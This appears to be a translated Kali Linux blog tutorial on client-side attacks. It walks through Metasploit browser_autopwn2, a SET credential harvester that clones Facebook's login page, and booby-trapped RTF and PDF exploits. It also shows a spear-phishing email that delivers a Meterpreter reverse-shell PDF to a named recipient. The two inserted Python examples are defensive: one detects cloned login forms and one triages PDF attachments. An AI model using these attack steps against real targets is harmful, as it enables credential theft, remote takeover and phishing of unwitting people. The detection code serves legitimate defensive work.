• Kali client-side attacks


    Browser attacks

    browser_autopwn2 (BAP2)

     mkdir /test    # create the directory for the server that will accept the responses
     use auxiliary/server/browser_autopwn2
     set SRVHOST 192.168.56.1
     set URIPATH /test
     # Assume the target is a PC and we do not want to rely on Adobe Flash being permitted, so exclude the Android and Flash exploits.
     set EXCLUDE_PATTERN android|adobe_flash
     show advanced    # view the full list of advanced options
     set ShowExploitList true
     set VERBOSE true
     exploit
     Have the target browser visit http://192.168.56.1/test

    Harvesting browser login credentials
    root@bt:# service apache2 start
    root@bt:# setoolkit

    Social-Engineering Attacks --> Website Attack Vectors --> Credential Harvester Attack Method --> Site Cloner

    IP address for the POST back in Harvester/Tabnabbing: enter this machine's IP

    set:webattack> Enter the url to clone:http://www.facebook.com    (the page to clone and fake)

    Three files are now generated under /var/www/ (in the html folder). Visiting this machine's IP then shows the same login page; if the target logs in, the password is stored in the generated harvester file.
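    From the defender's side, the cloned page described above has a recognisable shape: it is branded as one site (its links and images point at that site's domain) but its password form submits to the harvester's IP. The following is an added example, not code from the original post or from SET, that scans a page's HTML for exactly that mismatch; the HTML, the IP address and the URLs in it are constructed, and the "most linked domain" heuristic is my own simplification (no public-suffix lookup).

```python
"""Flag login forms that post credentials somewhere other than the site the page imitates."""
from collections import Counter
from html.parser import HTMLParser
from ipaddress import ip_address
from urllib.parse import urljoin, urlsplit


class _PageScanner(HTMLParser):
    """Collect every form (noting password fields) and the host of every absolute href/src."""

    def __init__(self):
        super().__init__()
        self.forms = []
        self.link_hosts = []
        self._form = None

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag == "form":
            self._form = {"action": a.get("action", ""), "method": (a.get("method") or "get").lower(), "password": False}
            self.forms.append(self._form)
        elif tag == "input" and self._form is not None and a.get("type", "").lower() == "password":
            self._form["password"] = True
        for attr in ("href", "src"):
            host = urlsplit(a.get(attr, "")).hostname
            if host:
                self.link_hosts.append(host)

    def handle_endtag(self, tag):
        if tag == "form":
            self._form = None


def _is_ip(host):
    try:
        ip_address(host)
        return True
    except ValueError:
        return False


def _base_domain(host):
    """Crude registrable domain: an IP literal stays as is, otherwise the last two labels."""
    return host if _is_ip(host) else ".".join(host.split(".")[-2:])


def find_suspicious_login_forms(html, page_url):
    """Return one finding per password form whose submit target does not belong to the claimed site."""
    scanner = _PageScanner()
    scanner.feed(html)
    # The brand the page claims is taken to be the domain most of its absolute links point at.
    common = Counter(_base_domain(h) for h in scanner.link_hosts).most_common(1)
    claimed = common[0][0] if common else None
    findings = []
    for form in scanner.forms:
        if not form["password"]:
            continue
        target = urlsplit(urljoin(page_url, form["action"]))
        host = target.hostname or ""
        reasons = []
        if _is_ip(host):
            reasons.append("posts to a bare IP address")  # the harvester's "POST back" address
        if claimed and _base_domain(host) != claimed:
            reasons.append(f"posts to {host} while the page's links point at {claimed}")
        if target.scheme == "http":
            reasons.append("sends credentials over plain HTTP")
        if reasons:
            findings.append({"action": target.geturl(), "method": form["method"], "reasons": reasons})
    return findings


# Constructed sample: a cloned login page served from a lab IP, with its form rewritten to post back there.
CLONED_PAGE = """<html><head><title>Facebook - Log In or Sign Up</title>
<link rel="stylesheet" href="https://static.xx.fbcdn.net/rsrc.php/main.css">
</head><body>
<a href="https://www.facebook.com/recover/initiate">Forgot password?</a>
<a href="https://www.facebook.com/r.php">Create new account</a>
<img src="https://www.facebook.com/images/logo.png">
<form method="post" action="index.html">
  <input type="text" name="email"><input type="password" name="pass"><input type="submit" value="Log In">
</form></body></html>"""

if __name__ == "__main__":
    for hit in find_suspicious_login_forms(CLONED_PAGE, "http://192.168.56.1/"):
        print(hit["action"], hit["method"], "->", "; ".join(hit["reasons"]))
```

    The same check run on the genuine page (links and form action both on facebook.com, served over HTTPS) produces no findings, which is what makes it usable as a proxy or browser-extension rule rather than a one-off.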

     Office

    MS10-087 vulnerability: run a custom exe file

    msf > db_status  postgresql selected, no connection
    msf > db_connect -y /opt/metasploit/apps/pro/ui/config/database.yml
    msf > search office
    msf > use exploit/windows/fileformat/ms10_087_rtf_pfragments_bof
    
    msf exploit(ms10_087_rtf_pfragments_bof) > set payload windows/exec
    msf exploit(ms10_087_rtf_pfragments_bof) > set cmd calc.exe
    msf exploit(ms10_087_rtf_pfragments_bof) > exploit 
    [+] msf.rtf stored at /root/.msf4/local/msf.rtf

    root@kali:~# cd /root/.msf4/local    # the generated msf.rtf is here
    /*************************************************************************/

    PDF

    use exploit/windows/fileformat/adobe_utilprintf    # Adobe Reader version must be lower than 8.1.2
    set FILENAME malicious.pdf
    set PAYLOAD windows/exec
    set CMD calc.exe
    show options
    exploit

    The PDF Stream Dumper tool can be used to analyze a PDF and extract the payload from it.

    For malicious PDF analysis, see:

    https://zeltser.com/analyzing-malicious-documents/

    https://zeltser.com/peepdf-malicious-pdf-analysis/

    MailAttack

    set> 1   Social-Engineering Attacks
    set> 1   Spear-Phishing Attack Vectors
    set:phishing>1       Perform a Mass Email Attack
    set:payloads>6    Adobe CoolType SING Table "uniqueName" Overflow
    set:payloads>2    Windows Meterpreter Reverse_TCP
    
    set:payloads> Port to connect back on [443]:
    
    All payloads get sent to the /pentest/exploits/set/src/program_junk/template.pdf directory
    
    Do you want to rename the file?
    example Enter the new filename: moo.pdf
    1. Keep the filename, I don't care.
    2. Rename the file, I want to be cool.
    
    ruby /opt/framework/msf3//msfcli exploit/windows/fileformat/adobe_cooltype_sing PAYLOAD=windows/meterpreter/reverse_tcp LHOST=10.10.10.128 LPORT=443 OUTPUTPATH=/root/.msf4/local/template.pdf FILENAME=/pentest/exploits/set/src/program_junk/template.pdf ENCODING=shikata_ga_nai E

    Special handling is then required. This vulnerability targets Adobe Reader versions before 9.3.4.

    Copy template.pdf to a machine with Adobe Acrobat Pro 9.5.0 installed (with antivirus turned off), open template.pdf, and after modifying it copy it back to the original directory, overwriting the original template.pdf.

    set:phishing>2
    set:phishing> New filename:Dvssc_ABC_Project_Statue.pdf
    set:phishing>1 E-Mail Attack Single Email Address
    set:phishing>2    One-Time Use Email Template
    set:phishing> Subject of the email:ABC Project Status
    set:phishing> Send the message as html or plain? 'h' or 'p' [p]:p
    
    set:phishing> Enter the body of the message, hit return for a new line. Control+c when finished:
    Next line of the body: Hi Wang:
    Next line of the body: Please review the ABC project status report. We are behind the schedule. I need your advice. 
    Next line of the body: 
    Next line of the body: Best Regard!
    Next line of the body: li Ming 
    Next line of the body: ^Cset:phishing> Send email to:wangdongpeng@dvssc.com
    
    set:phishing>2 Use your own server or open relay
    set:phishing> From address (ex: moo@example.com):liming@dvssc.com
    set:phishing> Username for open-relay [blank]:yourname
    Password for open-relay [blank]: 
    set:phishing> SMTP email server address (ex. smtp.youremailserveryouown.com):mail.163.com
    set:phishing> Port number for the SMTP server [25]:
    set:phishing> Flag this message/s as high priority? [yes|no]:yes
    [*] SET has finished delivering the emails
    set:phishing> Setup a listener [yes|no]:yes
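    Both the PDF analysis note above (PDF Stream Dumper, peepdf) and this mail attack come down to the same defensive question: does an incoming message carry a document with active content? The following is an added example, not code from the original post, from SET or from peepdf, that parses a constructed e-mail mirroring the session above (same From, Subject, priority flag and attachment name), inflates each FlateDecode stream in a PDF attachment and inventories the name objects that enable active content. The keyword list, the script-hint list and the minimal sample PDF are my own choices.

```python
"""Triage a phishing e-mail: header red flags plus an inventory of risky constructs in PDF attachments."""
import re
import zlib
from email import message_from_bytes, policy
from email.message import EmailMessage

# PDF name objects that carry or trigger active content (the same ones peepdf/PDF Stream Dumper highlight).
RISKY_PDF_KEYWORDS = (b"JavaScript", b"JS", b"OpenAction", b"AA", b"Launch", b"EmbeddedFile", b"RichMedia", b"ObjStm")
# Script fragments worth reporting when they appear inside an inflated stream.
SCRIPT_HINTS = (b"unescape(", b"eval(", b"app.", b"util.")


def inventory_pdf(data):
    """Count risky name objects in the raw bytes and look inside every stream that zlib can inflate."""
    counts = {}
    for kw in RISKY_PDF_KEYWORDS:
        n = len(re.findall(rb"/" + kw + rb"\b", data))
        if n:
            counts["/" + kw.decode()] = n
    hints = set()
    streams = inflated = 0
    for raw in re.findall(rb"stream\r?\n(.*?)\r?\nendstream", data, re.DOTALL):
        streams += 1
        try:
            body = zlib.decompress(raw)
        except zlib.error:
            continue  # not FlateDecode (or damaged); a real tool would try the other filters
        inflated += 1
        hints.update(h.decode() for h in SCRIPT_HINTS if h in body)
    return {"keywords": counts, "streams": streams, "inflated": inflated, "script_hints": sorted(hints)}


def triage_message(raw_message):
    """Parse an RFC 822 message and return a small report: header flags plus per-attachment findings."""
    msg = message_from_bytes(raw_message, policy=policy.default)
    report = {"from": str(msg["From"]), "subject": str(msg["Subject"]), "flags": [], "attachments": []}
    if msg["X-Priority"] in ("1", "2") or (msg["Importance"] or "").lower() == "high":
        report["flags"].append("marked high priority")  # the "high priority" flag SET offers above
    for part in msg.iter_attachments():
        name = part.get_filename() or "<unnamed>"
        payload = part.get_payload(decode=True) or b""
        entry = {"filename": name, "size": len(payload)}
        if payload.startswith(b"%PDF"):
            entry["pdf"] = inventory_pdf(payload)
            if entry["pdf"]["keywords"]:
                report["flags"].append(f"{name}: active content ({', '.join(entry['pdf']['keywords'])})")
        elif payload.startswith(b"{\\rtf"):
            report["flags"].append(f"{name}: RTF attachment")  # file-format exploits like the RTF one above ship as plain RTF
        report["attachments"].append(entry)
    return report


def build_sample_pdf():
    """Constructed minimal PDF: an OpenAction that runs JavaScript hidden in a FlateDecode stream."""
    js = zlib.compress(b'app.alert("constructed sample");')
    return (b"%PDF-1.4\n"
            b"1 0 obj << /Type /Catalog /Pages 2 0 R /OpenAction 3 0 R >> endobj\n"
            b"2 0 obj << /Type /Pages /Kids [] /Count 0 >> endobj\n"
            b"3 0 obj << /S /JavaScript /JS 4 0 R >> endobj\n"
            b"4 0 obj << /Length " + str(len(js)).encode() + b" /Filter /FlateDecode >>\nstream\n" + js +
            b"\nendstream\nendobj\ntrailer << /Root 1 0 R >>\n%%EOF\n")


def build_sample_email():
    """Constructed message mirroring the SET session above (addresses and subject are from that session)."""
    msg = EmailMessage()
    msg["From"] = "liming@dvssc.com"
    msg["To"] = "wangdongpeng@dvssc.com"
    msg["Subject"] = "ABC Project Status"
    msg["X-Priority"] = "1"
    msg.set_content("Hi Wang:\nPlease review the ABC project status report. We are behind the schedule.\n")
    msg.add_attachment(build_sample_pdf(), maintype="application", subtype="pdf",
                       filename="Dvssc_ABC_Project_Statue.pdf")
    return msg.as_bytes()


if __name__ == "__main__":
    for line in triage_message(build_sample_email())["flags"]:
        print(line)
```

    Inflating the streams is the step that matters: a plain string search over the file sees /OpenAction and /JS, but the script body itself only becomes visible after the FlateDecode stream is decompressed, which is why the analysis tools linked above do the same.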
  • Original source: https://www.cnblogs.com/ssooking/p/6066767.html